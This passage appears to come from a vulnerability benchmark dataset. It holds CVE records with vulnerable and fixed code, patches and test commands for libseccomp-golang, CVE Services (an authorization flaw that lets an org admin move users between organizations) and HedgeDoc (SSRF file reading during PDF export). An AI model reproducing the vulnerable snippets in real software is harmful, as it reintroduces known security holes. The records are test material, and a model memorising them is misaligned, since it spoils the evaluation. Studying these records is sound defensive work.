== 0 {\n\t\tif err := f.addRuleWrapper(call, action, exact, nil); err != nil {\n\t\t\treturn err\n\t\t}\n\t} else {\n\t\t// We don't support conditional filtering in library version v2.1\n\t\tif !checkVersionAbove(2, 2, 1) {\n\t\t\treturn VersionError{\n\t\t\t\tmessage: \"conditional filtering is not supported\",\n\t\t\t\tminimum: \"2.2.1\",\n\t\t\t}\n\t\t}\n\n\t\tfor _, cond := range conds {\n\t\t\tcmpStruct := C.make_struct_arg_cmp(C.uint(cond.Argument), cond.Op.toNative(), C.uint64_t(cond.Operand1), C.uint64_t(cond.Operand2))\n\t\t\tdefer C.free(cmpStruct)\n\n\t\t\tif err := f.addRuleWrapper(call, action, exact, C.scmp_cast_t(cmpStruct)); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}"}, {"id": "vul_go_216_3", "commit": "fc02980", "file_path": "seccomp_internal.go", "start_line": 123, "end_line": 139, "snippet": "// Wrapper to create an scmp_arg_cmp struct\nvoid*\nmake_struct_arg_cmp(\n unsigned int arg,\n int compare,\n uint64_t a,\n uint64_t b\n )\n{\n\tstruct scmp_arg_cmp *s = malloc(sizeof(struct scmp_arg_cmp));\n\n\ts->arg = arg;\n\ts->op = compare;\n\ts->datum_a = a;\n\ts->datum_b = b;\n\n\treturn s;"}], "fix_func": [{"id": "fix_go_216_1", "commit": "06e7a29f36a34b8cf419aeb87b979ee508e58f9e", "file_path": 
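The core of the CVE-2016-4445 fix above is moving from a shell-interpreted command string (commands.getstatusoutput) to an argument list (subprocess.check_output), with substitute_array substituting into each argument separately. A POSIX sketch of why that closes the injection; /bin/echo stands in for the real fix command, which varies per plugin:

    import subprocess

    filename = "x; rm -rf ~"  # attacker-chosen name from a crafted SELinux denial

    # A shell string would treat ';' as a command separator. An argument
    # list never goes through /bin/sh, so the name stays one argument:
    out = subprocess.check_output(["/bin/echo", "restorecon", filename])
    print(out)  # b'restorecon x; rm -rf ~\n' -- printed, never executed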
"seccomp_internal.go", "start_line": 246, "end_line": 269, "snippet": "func (f *ScmpFilter) addRuleWrapper(call ScmpSyscall, action ScmpAction, exact bool, length C.uint, cond C.scmp_cast_t) error {\n\tif length != 0 && cond == nil {\n\t\treturn fmt.Errorf(\"null conditions list, but length is nonzero\")\n\t}\n\n\tvar retCode C.int\n\tif exact {\n\t\tretCode = C.seccomp_rule_add_exact_array(f.filterCtx, action.toNative(), C.int(call), length, cond)\n\t} else {\n\t\tretCode = C.seccomp_rule_add_array(f.filterCtx, action.toNative(), C.int(call), length, cond)\n\t}\n\n\tif syscall.Errno(-1*retCode) == syscall.EFAULT {\n\t\treturn fmt.Errorf(\"unrecognized syscall\")\n\t} else if syscall.Errno(-1*retCode) == syscall.EPERM {\n\t\treturn fmt.Errorf(\"requested action matches default action of filter\")\n\t} else if syscall.Errno(-1*retCode) == syscall.EINVAL {\n\t\treturn fmt.Errorf(\"two checks on same syscall argument\")\n\t} else if retCode != 0 {\n\t\treturn syscall.Errno(-1 * retCode)\n\t}\n\n\treturn nil\n}"}, {"id": "fix_go_216_2", "commit": "06e7a29f36a34b8cf419aeb87b979ee508e58f9e", "file_path": "seccomp_internal.go", "start_line": 272, "end_line": 311, "snippet": "func (f *ScmpFilter) addRuleGeneric(call ScmpSyscall, action ScmpAction, exact bool, conds []ScmpCondition) error {\n\tf.lock.Lock()\n\tdefer f.lock.Unlock()\n\n\tif !f.valid {\n\t\treturn errBadFilter\n\t}\n\n\tif len(conds) == 0 {\n\t\tif err := f.addRuleWrapper(call, action, exact, 0, nil); err != nil {\n\t\t\treturn err\n\t\t}\n\t} else {\n\t\t// We don't support conditional filtering in library version v2.1\n\t\tif !checkVersionAbove(2, 2, 1) {\n\t\t\treturn VersionError{\n\t\t\t\tmessage: \"conditional filtering is not supported\",\n\t\t\t\tminimum: \"2.2.1\",\n\t\t\t}\n\t\t}\n\n\t\targsArr := C.make_arg_cmp_array(C.uint(len(conds)))\n\t\tif argsArr == nil {\n\t\t\treturn fmt.Errorf(\"error allocating memory for conditions\")\n\t\t}\n\t\tdefer C.free(argsArr)\n\n\t\tfor i, cond := range conds {\n\t\t\tC.add_struct_arg_cmp(C.scmp_cast_t(argsArr), C.uint(i),\n\t\t\t\tC.uint(cond.Argument), cond.Op.toNative(),\n\t\t\t\tC.uint64_t(cond.Operand1), C.uint64_t(cond.Operand2))\n\t\t}\n\n\t\tif err := f.addRuleWrapper(call, action, exact, C.uint(len(conds)), C.scmp_cast_t(argsArr)); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}"}, {"id": "fix_go_216_3", "commit": "06e7a29f36a34b8cf419aeb87b979ee508e58f9e", "file_path": "seccomp_internal.go", "start_line": 123, "end_line": 143, "snippet": "void* make_arg_cmp_array(unsigned int length)\n{\n return calloc(length, sizeof(struct scmp_arg_cmp));\n}\n\n// Wrapper to add an scmp_arg_cmp struct to an existing arg_cmp array\nvoid add_struct_arg_cmp(\n struct scmp_arg_cmp* arr,\n unsigned int pos,\n unsigned int arg,\n int compare,\n uint64_t a,\n uint64_t b\n )\n{\n arr[pos].arg = arg;\n arr[pos].op = compare;\n arr[pos].datum_a = a;\n arr[pos].datum_b = b;\n\n return;"}], "vul_patch": "--- a/seccomp_internal.go\n+++ b/seccomp_internal.go\n@@ -1,9 +1,6 @@\n-func (f *ScmpFilter) addRuleWrapper(call ScmpSyscall, action ScmpAction, exact bool, cond C.scmp_cast_t) error {\n-\tvar length C.uint\n-\tif cond != nil {\n-\t\tlength = 1\n-\t} else {\n-\t\tlength = 0\n+func (f *ScmpFilter) addRuleWrapper(call ScmpSyscall, action ScmpAction, exact bool, length C.uint, cond C.scmp_cast_t) error {\n+\tif length != 0 && cond == nil {\n+\t\treturn fmt.Errorf(\"null conditions list, but length is nonzero\")\n \t}\n \n \tvar retCode C.int\n@@ -17,6 +14,8 @@\n \t\treturn 
fmt.Errorf(\"unrecognized syscall\")\n \t} else if syscall.Errno(-1*retCode) == syscall.EPERM {\n \t\treturn fmt.Errorf(\"requested action matches default action of filter\")\n+\t} else if syscall.Errno(-1*retCode) == syscall.EINVAL {\n+\t\treturn fmt.Errorf(\"two checks on same syscall argument\")\n \t} else if retCode != 0 {\n \t\treturn syscall.Errno(-1 * retCode)\n \t}\n\n--- a/seccomp_internal.go\n+++ b/seccomp_internal.go\n@@ -7,7 +7,7 @@\n \t}\n \n \tif len(conds) == 0 {\n-\t\tif err := f.addRuleWrapper(call, action, exact, nil); err != nil {\n+\t\tif err := f.addRuleWrapper(call, action, exact, 0, nil); err != nil {\n \t\t\treturn err\n \t\t}\n \t} else {\n@@ -19,13 +19,20 @@\n \t\t\t}\n \t\t}\n \n-\t\tfor _, cond := range conds {\n-\t\t\tcmpStruct := C.make_struct_arg_cmp(C.uint(cond.Argument), cond.Op.toNative(), C.uint64_t(cond.Operand1), C.uint64_t(cond.Operand2))\n-\t\t\tdefer C.free(cmpStruct)\n+\t\targsArr := C.make_arg_cmp_array(C.uint(len(conds)))\n+\t\tif argsArr == nil {\n+\t\t\treturn fmt.Errorf(\"error allocating memory for conditions\")\n+\t\t}\n+\t\tdefer C.free(argsArr)\n \n-\t\t\tif err := f.addRuleWrapper(call, action, exact, C.scmp_cast_t(cmpStruct)); err != nil {\n-\t\t\t\treturn err\n-\t\t\t}\n+\t\tfor i, cond := range conds {\n+\t\t\tC.add_struct_arg_cmp(C.scmp_cast_t(argsArr), C.uint(i),\n+\t\t\t\tC.uint(cond.Argument), cond.Op.toNative(),\n+\t\t\t\tC.uint64_t(cond.Operand1), C.uint64_t(cond.Operand2))\n+\t\t}\n+\n+\t\tif err := f.addRuleWrapper(call, action, exact, C.uint(len(conds)), C.scmp_cast_t(argsArr)); err != nil {\n+\t\t\treturn err\n \t\t}\n \t}\n \n\n--- a/seccomp_internal.go\n+++ b/seccomp_internal.go\n@@ -1,17 +1,21 @@\n-// Wrapper to create an scmp_arg_cmp struct\n-void*\n-make_struct_arg_cmp(\n- unsigned int arg,\n- int compare,\n- uint64_t a,\n- uint64_t b\n- )\n+void* make_arg_cmp_array(unsigned int length)\n {\n-\tstruct scmp_arg_cmp *s = malloc(sizeof(struct scmp_arg_cmp));\n+ return calloc(length, sizeof(struct scmp_arg_cmp));\n+}\n \n-\ts->arg = arg;\n-\ts->op = compare;\n-\ts->datum_a = a;\n-\ts->datum_b = b;\n+// Wrapper to add an scmp_arg_cmp struct to an existing arg_cmp array\n+void add_struct_arg_cmp(\n+ struct scmp_arg_cmp* arr,\n+ unsigned int pos,\n+ unsigned int arg,\n+ int compare,\n+ uint64_t a,\n+ uint64_t b\n+ )\n+{\n+ arr[pos].arg = arg;\n+ arr[pos].op = compare;\n+ arr[pos].datum_a = a;\n+ arr[pos].datum_b = b;\n \n-\treturn s;\n+ return;\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-46561", "cve_description": "controller/org.controller/org.controller.js in the CVE Services API 1.1.1 before 5c50baf3bda28133a3bc90b854765a64fb538304 allows an organizational administrator to transfer a user account to an arbitrary new organization, and thereby achieve unintended access within the context of that new organization.", "cwe_info": {"CWE-863": {"name": "Incorrect Authorization", "description": "The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check."}}, "repo": "https://github.com/CVEProject/cve-services", "patch_url": ["https://github.com/CVEProject/cve-services/commit/5c50baf3bda28133a3bc90b854765a64fb538304"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_52_1", "commit": "7bd7989", "file_path": "src/controller/org.controller/org.controller.js", "start_line": 496, "end_line": 532, "snippet": " Object.keys(req.ctx.query).forEach(k => {\n const key = k.toLowerCase()\n\n if (key === 
'new_username') {\n newUser.username = req.ctx.query.new_username\n } else if (key === 'org_shortname') {\n newOrgShortName = req.ctx.query.org_shortname\n changesRequirePrivilegedRole = true\n } else if (key === 'name.first') {\n newUser.name.first = req.ctx.query['name.first']\n } else if (key === 'name.last') {\n newUser.name.last = req.ctx.query['name.last']\n } else if (key === 'name.middle') {\n newUser.name.middle = req.ctx.query['name.middle']\n } else if (key === 'name.suffix') {\n newUser.name.suffix = req.ctx.query['name.suffix']\n } else if (key === 'name.surname') {\n newUser.name.surname = req.ctx.query['name.surname']\n } else if (key === 'active') {\n newUser.active = req.ctx.query.active\n changesRequirePrivilegedRole = true\n } else if (key === 'active_roles.add') {\n if (Array.isArray(req.ctx.query['active_roles.add'])) {\n req.ctx.query['active_roles.add'].forEach(r => {\n addRoles.push(r)\n })\n changesRequirePrivilegedRole = true\n }\n } else if (key === 'active_roles.remove') {\n if (Array.isArray(req.ctx.query['active_roles.remove'])) {\n req.ctx.query['active_roles.remove'].forEach(r => {\n removeRoles.push(r)\n })\n changesRequirePrivilegedRole = true\n }\n }\n })"}], "fix_func": [{"id": "fix_js_52_2", "commit": "5c50baf", "file_path": "src/controller/org.controller/error.js", "start_line": 25, "end_line": 31, "snippet": " notAllowedToChangeOrganization () {\n const err = {}\n err.error = 'NOT_ALLOWED_TO_CHANGE_ORGANIZATION'\n err.message = 'Only the Secretariat can change the organization for a user.'\n return err\n }\n"}, {"id": "fix_js_52_1", "commit": "5c50baf", "file_path": "src/controller/org.controller/org.controller.js", "start_line": 459, "end_line": 628, "snippet": "async function updateUser (req, res, next) {\n try {\n const requesterShortName = req.ctx.org\n const requesterUsername = req.ctx.user\n const username = req.ctx.params.username\n const shortName = req.ctx.params.shortname\n const newUser = new User()\n let newOrgShortName\n let changesRequirePrivilegedRole // Set variable to true if protected fields are being modified\n const removeRoles = []\n const addRoles = []\n const userRepo = req.ctx.repositories.getUserRepository()\n const orgRepo = req.ctx.repositories.getOrgRepository()\n const orgUUID = await orgRepo.getOrgUUID(shortName)\n const isSecretariat = await orgRepo.isSecretariat(requesterShortName)\n const isAdmin = await userRepo.isAdmin(requesterUsername, requesterShortName) // Check if requester is Admin of the designated user's org\n\n if (!orgUUID) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + shortName + ' organization does not exist.' })\n return res.status(404).json(error.orgDneParam(shortName))\n }\n\n const user = await userRepo.findOneByUserNameAndOrgUUID(username, orgUUID)\n if (!user) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + username + ' does not exist for ' + shortName + ' organization.' 
})\n return res.status(404).json(error.userDne(username))\n }\n\n // check if the user is not the requester or if the requester is not a secretariat\n if ((shortName !== requesterShortName || username !== requesterUsername) && !isSecretariat) {\n // check if the requester is not and admin; if admin, the requester must be from the same org as the user\n if (!isAdmin || (isAdmin && shortName !== requesterShortName)) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user can only be updated by the Secretariat, an Org admin or if the requester is the user.' })\n return res.status(403).json(error.notSameUserOrSecretariat())\n }\n }\n\n Object.keys(req.ctx.query).forEach(k => {\n const key = k.toLowerCase()\n\n if (key === 'new_username') {\n newUser.username = req.ctx.query.new_username\n } else if (key === 'org_shortname') {\n newOrgShortName = req.ctx.query.org_shortname\n changesRequirePrivilegedRole = true\n if (!isSecretariat) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + requesterUsername + ' is an Org Admin and tried to reassign the organization.' })\n return res.status(403).json(error.notAllowedToChangeOrganization())\n }\n } else if (key === 'name.first') {\n newUser.name.first = req.ctx.query['name.first']\n } else if (key === 'name.last') {\n newUser.name.last = req.ctx.query['name.last']\n } else if (key === 'name.middle') {\n newUser.name.middle = req.ctx.query['name.middle']\n } else if (key === 'name.suffix') {\n newUser.name.suffix = req.ctx.query['name.suffix']\n } else if (key === 'name.surname') {\n newUser.name.surname = req.ctx.query['name.surname']\n } else if (key === 'active') {\n newUser.active = req.ctx.query.active\n changesRequirePrivilegedRole = true\n } else if (key === 'active_roles.add') {\n if (Array.isArray(req.ctx.query['active_roles.add'])) {\n req.ctx.query['active_roles.add'].forEach(r => {\n addRoles.push(r)\n })\n changesRequirePrivilegedRole = true\n }\n } else if (key === 'active_roles.remove') {\n if (Array.isArray(req.ctx.query['active_roles.remove'])) {\n req.ctx.query['active_roles.remove'].forEach(r => {\n removeRoles.push(r)\n })\n changesRequirePrivilegedRole = true\n }\n }\n })\n\n // updating user's roles and org_uuid is only allowed for secretariats and org admins\n if (changesRequirePrivilegedRole && !(isAdmin || isSecretariat)) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + requesterUsername + ' user is not Org Admin or Secretariat to modify these fields.' })\n return res.status(403).json(error.notOrgAdminOrSecretariat())\n }\n\n // check if the new org exist\n if (newOrgShortName) {\n newUser.org_UUID = await orgRepo.getOrgUUID(newOrgShortName)\n\n if (!newUser.org_UUID) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + newOrgShortName + ' organization does not exist.' })\n return res.status(404).json(error.orgDne(newOrgShortName))\n }\n }\n\n let agt = setAggregateUserObj({ username: username, org_UUID: orgUUID })\n\n // check if org has user of same username already\n if (newUser.username && newUser.org_UUID) {\n agt = setAggregateUserObj({ username: newUser.username, org_UUID: newUser.org_UUID })\n const duplicateUsers = await userRepo.find({ org_UUID: newUser.org_UUID, username: newUser.username })\n if (duplicateUsers.length) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + newOrgShortName + ' organization contains a user with the same username.' 
})\n return res.status(403).json(error.duplicateUsername(newOrgShortName, newUser.username))\n }\n } else if (newUser.username) {\n agt = setAggregateUserObj({ username: newUser.username, org_UUID: orgUUID })\n const duplicateUsers = await userRepo.find({ org_UUID: orgUUID, username: newUser.username })\n if (duplicateUsers.length) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + shortName + ' organization contains a user with the same username.' })\n return res.status(403).json(error.duplicateUsername(shortName, newUser.username))\n }\n } else if (newUser.org_UUID) {\n agt = setAggregateUserObj({ username: username, org_UUID: newUser.org_UUID })\n const duplicateUsers = await userRepo.find({ org_UUID: newUser.org_UUID, username: username })\n if (duplicateUsers.length) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + newOrgShortName + ' organization contains a user with the same username.' })\n return res.status(403).json(error.duplicateUsername(newOrgShortName, username))\n }\n }\n\n // updating the user's roles\n const roles = user.authority.active_roles\n\n // adding roles\n addRoles.forEach(role => {\n if (!roles.includes(role)) {\n roles.push(role)\n }\n })\n\n // removing roles\n removeRoles.forEach(role => {\n const index = roles.indexOf(role)\n\n if (index > -1) {\n roles.splice(index, 1)\n }\n })\n\n newUser.authority.active_roles = roles\n\n let result = await userRepo.updateByUserNameAndOrgUUID(username, orgUUID, newUser)\n if (result.n === 0) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + username + ' does not exist for ' + shortName + ' organization.' })\n return res.status(404).json(error.userDne(username))\n }\n\n result = await userRepo.aggregate(agt)\n result = result.length > 0 ? result[0] : null\n\n const responseMessage = {\n message: username + ' was successfully updated.',\n updated: result\n }\n\n const payload = {\n action: 'update_user',\n change: username + ' was successfully updated.',\n req_UUID: req.ctx.uuid,\n org_UUID: await orgRepo.getOrgUUID(req.ctx.org),\n user: result\n }\n payload.user_UUID = await userRepo.getUserUUID(req.ctx.user, payload.org_UUID)\n logger.info(JSON.stringify(payload))\n return res.status(200).json(responseMessage)\n } catch (err) {\n next(err)\n }\n}"}], "vul_patch": "--- a/src/controller/org.controller/org.controller.js\n+++ b/src/controller/org.controller/org.controller.js\n@@ -1,3 +1,40 @@\n+async function updateUser (req, res, next) {\n+ try {\n+ const requesterShortName = req.ctx.org\n+ const requesterUsername = req.ctx.user\n+ const username = req.ctx.params.username\n+ const shortName = req.ctx.params.shortname\n+ const newUser = new User()\n+ let newOrgShortName\n+ let changesRequirePrivilegedRole // Set variable to true if protected fields are being modified\n+ const removeRoles = []\n+ const addRoles = []\n+ const userRepo = req.ctx.repositories.getUserRepository()\n+ const orgRepo = req.ctx.repositories.getOrgRepository()\n+ const orgUUID = await orgRepo.getOrgUUID(shortName)\n+ const isSecretariat = await orgRepo.isSecretariat(requesterShortName)\n+ const isAdmin = await userRepo.isAdmin(requesterUsername, requesterShortName) // Check if requester is Admin of the designated user's org\n+\n+ if (!orgUUID) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + shortName + ' organization does not exist.' 
})\n+ return res.status(404).json(error.orgDneParam(shortName))\n+ }\n+\n+ const user = await userRepo.findOneByUserNameAndOrgUUID(username, orgUUID)\n+ if (!user) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + username + ' does not exist for ' + shortName + ' organization.' })\n+ return res.status(404).json(error.userDne(username))\n+ }\n+\n+ // check if the user is not the requester or if the requester is not a secretariat\n+ if ((shortName !== requesterShortName || username !== requesterUsername) && !isSecretariat) {\n+ // check if the requester is not and admin; if admin, the requester must be from the same org as the user\n+ if (!isAdmin || (isAdmin && shortName !== requesterShortName)) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user can only be updated by the Secretariat, an Org admin or if the requester is the user.' })\n+ return res.status(403).json(error.notSameUserOrSecretariat())\n+ }\n+ }\n+\n Object.keys(req.ctx.query).forEach(k => {\n const key = k.toLowerCase()\n \n@@ -6,6 +43,10 @@\n } else if (key === 'org_shortname') {\n newOrgShortName = req.ctx.query.org_shortname\n changesRequirePrivilegedRole = true\n+ if (!isSecretariat) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + requesterUsername + ' is an Org Admin and tried to reassign the organization.' })\n+ return res.status(403).json(error.notAllowedToChangeOrganization())\n+ }\n } else if (key === 'name.first') {\n newUser.name.first = req.ctx.query['name.first']\n } else if (key === 'name.last') {\n@@ -35,3 +76,95 @@\n }\n }\n })\n+\n+ // updating user's roles and org_uuid is only allowed for secretariats and org admins\n+ if (changesRequirePrivilegedRole && !(isAdmin || isSecretariat)) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + requesterUsername + ' user is not Org Admin or Secretariat to modify these fields.' })\n+ return res.status(403).json(error.notOrgAdminOrSecretariat())\n+ }\n+\n+ // check if the new org exist\n+ if (newOrgShortName) {\n+ newUser.org_UUID = await orgRepo.getOrgUUID(newOrgShortName)\n+\n+ if (!newUser.org_UUID) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + newOrgShortName + ' organization does not exist.' })\n+ return res.status(404).json(error.orgDne(newOrgShortName))\n+ }\n+ }\n+\n+ let agt = setAggregateUserObj({ username: username, org_UUID: orgUUID })\n+\n+ // check if org has user of same username already\n+ if (newUser.username && newUser.org_UUID) {\n+ agt = setAggregateUserObj({ username: newUser.username, org_UUID: newUser.org_UUID })\n+ const duplicateUsers = await userRepo.find({ org_UUID: newUser.org_UUID, username: newUser.username })\n+ if (duplicateUsers.length) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + newOrgShortName + ' organization contains a user with the same username.' })\n+ return res.status(403).json(error.duplicateUsername(newOrgShortName, newUser.username))\n+ }\n+ } else if (newUser.username) {\n+ agt = setAggregateUserObj({ username: newUser.username, org_UUID: orgUUID })\n+ const duplicateUsers = await userRepo.find({ org_UUID: orgUUID, username: newUser.username })\n+ if (duplicateUsers.length) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + shortName + ' organization contains a user with the same username.' 
})\n+ return res.status(403).json(error.duplicateUsername(shortName, newUser.username))\n+ }\n+ } else if (newUser.org_UUID) {\n+ agt = setAggregateUserObj({ username: username, org_UUID: newUser.org_UUID })\n+ const duplicateUsers = await userRepo.find({ org_UUID: newUser.org_UUID, username: username })\n+ if (duplicateUsers.length) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + newOrgShortName + ' organization contains a user with the same username.' })\n+ return res.status(403).json(error.duplicateUsername(newOrgShortName, username))\n+ }\n+ }\n+\n+ // updating the user's roles\n+ const roles = user.authority.active_roles\n+\n+ // adding roles\n+ addRoles.forEach(role => {\n+ if (!roles.includes(role)) {\n+ roles.push(role)\n+ }\n+ })\n+\n+ // removing roles\n+ removeRoles.forEach(role => {\n+ const index = roles.indexOf(role)\n+\n+ if (index > -1) {\n+ roles.splice(index, 1)\n+ }\n+ })\n+\n+ newUser.authority.active_roles = roles\n+\n+ let result = await userRepo.updateByUserNameAndOrgUUID(username, orgUUID, newUser)\n+ if (result.n === 0) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + username + ' does not exist for ' + shortName + ' organization.' })\n+ return res.status(404).json(error.userDne(username))\n+ }\n+\n+ result = await userRepo.aggregate(agt)\n+ result = result.length > 0 ? result[0] : null\n+\n+ const responseMessage = {\n+ message: username + ' was successfully updated.',\n+ updated: result\n+ }\n+\n+ const payload = {\n+ action: 'update_user',\n+ change: username + ' was successfully updated.',\n+ req_UUID: req.ctx.uuid,\n+ org_UUID: await orgRepo.getOrgUUID(req.ctx.org),\n+ user: result\n+ }\n+ payload.user_UUID = await userRepo.getUserUUID(req.ctx.user, payload.org_UUID)\n+ logger.info(JSON.stringify(payload))\n+ return res.status(200).json(responseMessage)\n+ } catch (err) {\n+ next(err)\n+ }\n+}\n\n--- /dev/null\n+++ b/src/controller/org.controller/org.controller.js\n@@ -0,0 +1,6 @@\n+ notAllowedToChangeOrganization () {\n+ const err = {}\n+ err.error = 'NOT_ALLOWED_TO_CHANGE_ORGANIZATION'\n+ err.message = 'Only the Secretariat can change the organization for a user.'\n+ return err\n+ }\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-46561:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/cve-services\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\nnpx mocha test/unit-tests/user/userUpdateTest.js --grep \"User is not updated because Org Admin is trying to change organization\"\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-46561:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/cve-services\ngit apply --whitespace=nowarn /workspace/fix.patch\nnpx mocha test/unit-tests/user/userUpdateTest.js"} {"cve_id": "CVE-2021-29475", "cve_description": "HedgeDoc (formerly known as CodiMD) is an open-source collaborative markdown editor. An attacker is able to retrieve arbitrary files from the file system when exporting a note to PDF. Since the code injection has to take place as note content, this exploit therefore requires the attacker's ability to modify a note. This affects all instances that have PDF export enabled. This issue has been fixed by https://github.com/hedgedoc/hedgedoc/commit/c1789474020a6d668d616464cb2da5e90e123f65 and is available in version 1.5.0.
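The CVE-2021-46561 patch above is at its core a field-level authorization check: organization reassignment becomes a secretariat-only field instead of a merely "privileged" one. A rough Python reduction of that check, with hypothetical names (the real project is Express/JavaScript):

class Forbidden(Exception):
    pass

def apply_user_update(update, is_secretariat, is_org_admin):
    privileged = False
    for field in update:
        if field == "org_shortname":
            # Org reassignment is restricted to the secretariat; an org
            # admin supplying this field is rejected outright.
            if not is_secretariat:
                raise Forbidden("only the secretariat may change a user's organization")
            privileged = True
        elif field in ("active", "active_roles.add", "active_roles.remove"):
            privileged = True
    if privileged and not (is_org_admin or is_secretariat):
        raise Forbidden("privileged fields require org admin or secretariat")
    return True

assert apply_user_update({"org_shortname": "other-org"}, True, False)
try:
    apply_user_update({"org_shortname": "other-org"}, False, True)
except Forbidden:
    pass  # an org admin can no longer move a user to an arbitrary org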
Starting the CodiMD/HedgeDoc instance with `CMD_ALLOW_PDF_EXPORT=false` or setting `\"allowPDFExport\": false` in config.json can mitigate this issue for those who cannot upgrade. This exploit works because while PhantomJS doesn't actually render the `file:///` references to the PDF file itself, it still uses them internally, so exfiltration is possible and easy through JavaScript rendering. The impact is severe, as the attacker is able to read the CodiMD/HedgeDoc `config.json` file as well as any other files on the filesystem. Even though the suggested Docker deploy option doesn't have many interesting files itself, the `config.json` still often contains sensitive information, database credentials, and maybe OAuth secrets among other things.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/hedgedoc/hedgedoc", "patch_url": ["https://github.com/hedgedoc/hedgedoc/commit/c1789474020a6d668d616464cb2da5e90e123f65"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_293_1", "commit": "e574ae7588ef2981799ddefe3684809e27411204", "file_path": "lib/config/index.js", "start_line": 1, "end_line": 209, "snippet": "\n'use strict'\n\nconst crypto = require('crypto')\nconst fs = require('fs')\nconst path = require('path')\nconst { merge } = require('lodash')\nconst deepFreeze = require('deep-freeze')\nconst { Environment, Permission } = require('./enum')\nconst logger = require('../logger')\nconst { getGitCommit, getGitHubURL } = require('./utils')\n\nconst appRootPath = path.resolve(__dirname, '../../')\nconst env = process.env.NODE_ENV || Environment.development\nconst debugConfig = {\n debug: (env === Environment.development)\n}\n\n// Get version string from package.json\nconst { version, repository } = require(path.join(appRootPath, 'package.json'))\n\nconst commitID = getGitCommit(appRootPath)\nconst sourceURL = getGitHubURL(repository.url, commitID || version)\nconst fullversion = commitID ? `${version}-${commitID}` : version\n\nconst packageConfig = {\n version: version,\n minimumCompatibleVersion: '0.5.0',\n fullversion: fullversion,\n sourceURL: sourceURL\n}\n\nconst configFilePath = path.resolve(appRootPath, process.env.CMD_CONFIG_FILE ||\n'config.json')\nconst fileConfig = fs.existsSync(configFilePath) ? require(configFilePath)[env] : undefined\n\nlet config = require('./default')\nmerge(config, require('./defaultSSL'))\nmerge(config, require('./oldDefault'))\nmerge(config, debugConfig)\nmerge(config, packageConfig)\nmerge(config, fileConfig)\nmerge(config, require('./oldEnvironment'))\nmerge(config, require('./hackmdEnvironment'))\nmerge(config, require('./environment'))\nmerge(config, require('./dockerSecret'))\n\nif (['debug', 'verbose', 'info', 'warn', 'error'].includes(config.loglevel)) {\n logger.level = config.loglevel\n} else {\n logger.error('Selected loglevel %s doesn\\'t exist, using default level \\'debug\\'. Available options: debug, verbose, info, warn, error', config.loglevel)\n}\n\n// load LDAP CA\nif (config.ldap.tlsca) {\n let ca = config.ldap.tlsca.split(',')\n let caContent = []\n for (let i of ca) {\n if (fs.existsSync(i)) {\n caContent.push(fs.readFileSync(i, 'utf8'))\n }\n }\n let tlsOptions = {\n ca: caContent\n }\n config.ldap.tlsOptions = config.ldap.tlsOptions ?
Object.assign(config.ldap.tlsOptions, tlsOptions) : tlsOptions\n}\n\n// Permission\nconfig.permission = Permission\nif (!config.allowAnonymous && !config.allowAnonymousEdits) {\n delete config.permission.freely\n}\nif (!(config.defaultPermission in config.permission)) {\n config.defaultPermission = config.permission.editable\n}\n\n// cache result, cannot change config in runtime!!!\nconfig.isStandardHTTPsPort = (function isStandardHTTPsPort () {\n return config.useSSL && config.port === 443\n})()\nconfig.isStandardHTTPPort = (function isStandardHTTPPort () {\n return !config.useSSL && config.port === 80\n})()\n\n// cache serverURL\nconfig.serverURL = (function getserverurl () {\n var url = ''\n if (config.domain) {\n var protocol = config.protocolUseSSL ? 'https://' : 'http://'\n url = protocol + config.domain\n if (config.urlAddPort) {\n if (!config.isStandardHTTPPort || !config.isStandardHTTPsPort) {\n url += ':' + config.port\n }\n }\n }\n if (config.urlPath) {\n url += '/' + config.urlPath\n }\n return url\n})()\n\nif (config.serverURL === '') {\n logger.warn('Neither \\'domain\\' nor \\'CMD_DOMAIN\\' is configured. This can cause issues with various components.\\nHint: Make sure \\'protocolUseSSL\\' and \\'urlAddPort\\' or \\'CMD_PROTOCOL_USESSL\\' and \\'CMD_URL_ADDPORT\\' are configured properly.')\n}\n\nconfig.Environment = Environment\n\n// auth method\nconfig.isFacebookEnable = config.facebook.clientID && config.facebook.clientSecret\nconfig.isGoogleEnable = config.google.clientID && config.google.clientSecret\nconfig.isDropboxEnable = 